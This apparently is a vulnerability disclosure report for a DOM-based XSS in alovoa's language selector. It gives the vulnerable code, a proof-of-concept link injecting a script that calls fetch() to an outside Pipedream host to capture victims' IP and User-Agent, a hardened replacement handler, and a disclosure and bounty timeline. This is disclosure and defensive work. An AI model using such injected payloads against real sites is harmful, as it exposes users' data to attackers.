Cross-site Scripting (XSS) - DOM in alovoa/alovoa

Valid

Reported on

Jul 19th 2021


✍️ Description

It is possible to run JavaScript code in the web page through unsanitized DOM properties. The function onChangeLocal sets window.location.search directly from a value taken from the URL, without any prior checks.

🕵️‍♂️ Proof of Concept

<script>
// Vulnerable function in file fragments.html:139 (kept exactly as reported)
function onChangeLocal(e) {
  // value of the currently selected <option>, taken as-is
  let val = e.options[e.selectedIndex].value;
  console.log(val);
  // assigned to the query string without validation or encoding
  window.location.search = val;
}
</script>

A quick example can be done by obtaining IP and User-Agent info from a victim: the attacker sets up a web server. For PoC purposes, a Pipedream URL was used: https://en8ysa1cvfw0x29.m.pipedream.net

The attacker also sends the following link to the victim: https://alovoa.com/?lang=es"><script>fetch("https://en8ysa1cvfw0x29.m.pipedream.net")</script>

So val is set to the malicious payload.

When the victim opens the link, the attacker gets the IP and User-Agent.
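The handler above takes the selected option's value on trust. The following is an added example, not alovoa's code and not part of the original report, showing the defensive counterpart: the value is validated against a strict language-tag pattern and the query string is rebuilt with URLSearchParams, so a value shaped like the report's payload is rejected instead of being navigated to. The names validateLangTag, buildLangSearch and onChangeLocalSafe, the regular expression, and the sample select objects are all assumptions made for this example; the `loc` parameter exists only so the handler can be exercised outside a browser.

```javascript
// Added example (not alovoa's code): hardened replacement for the onChangeLocal
// handler in the report. The selected <option> value is treated as untrusted input.

// Assumed shape of an acceptable value: a primary language subtag with an
// optional region, e.g. "es" or "pt-BR". Anything else is rejected outright.
const LANG_TAG = /^[a-z]{2,3}(-[A-Za-z]{2,4})?$/;

// Returns the trimmed tag when it matches LANG_TAG, otherwise null.
function validateLangTag(raw) {
  if (typeof raw !== "string") return null;
  const val = raw.trim();
  return LANG_TAG.test(val) ? val : null;
}

// Builds the new query string from the existing one plus a validated lang value.
// Returns null when the value is rejected, so the caller never navigates with it.
function buildLangSearch(raw, currentSearch = "") {
  const lang = validateLangTag(raw);
  if (lang === null) return null;
  const params = new URLSearchParams(currentSearch);
  params.set("lang", lang); // serialised with percent-encoding, never verbatim
  return "?" + params.toString();
}

// Drop-in handler. In the browser `loc` defaults to window.location; passing a
// plain object with a `search` property makes the function testable in Node.
function onChangeLocalSafe(e, loc = globalThis.location) {
  const raw = e.options[e.selectedIndex].value;
  const search = buildLangSearch(raw, loc.search);
  if (search === null) {
    console.warn("onChangeLocalSafe: rejected unexpected lang value");
    return false;
  }
  loc.search = search;
  return true;
}

// Constructed sample inputs mirroring the benign and malicious values in the report
// (attacker host replaced by a placeholder).
const benignSelect = { selectedIndex: 0, options: [{ value: "es" }] };
const maliciousSelect = {
  selectedIndex: 0,
  options: [{ value: 'es"><script>fetch("https://attacker.example")</script>' }],
};

// Stand-alone demonstration against fake location objects.
const demoLoc = { search: "?page=2" };
onChangeLocalSafe(benignSelect, demoLoc);    // demoLoc.search becomes "?page=2&lang=es"
onChangeLocalSafe(maliciousSelect, demoLoc); // rejected; demoLoc.search is unchanged
```

The allowlist check is the important part: encoding alone would stop the markup from being interpreted, but it would still send users to a URL carrying attacker-chosen text, so rejecting anything that is not a plausible language tag is the safer default.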


💥 Impact

This could be used by an attacker to get users to open a malicious link and then obtain personal information or perform other malicious actions.


Ileana Barrionuevo modified the report 2 years ago
We have contacted a member of the alovoa team and are waiting to hear back 2 years ago
Nho Quy Dinh validated this vulnerability 2 years ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nho Quy Dinh marked this as fixed with commit 01ae69 2 years ago
Nho Quy Dinh has been awarded the fix bounty
This vulnerability will not receive a CVE
amammad, 2 years ago:

Dear Ileana Barrionuevo, I don't like to find bugs on repositories that someone is already working on, so if you let me, I'll work on Alovoa. Your friend, Amammad.

Ileana (Researcher), 2 years ago:

Hi Amammad, I don't have any problem :) Four eyes see better than two. :D
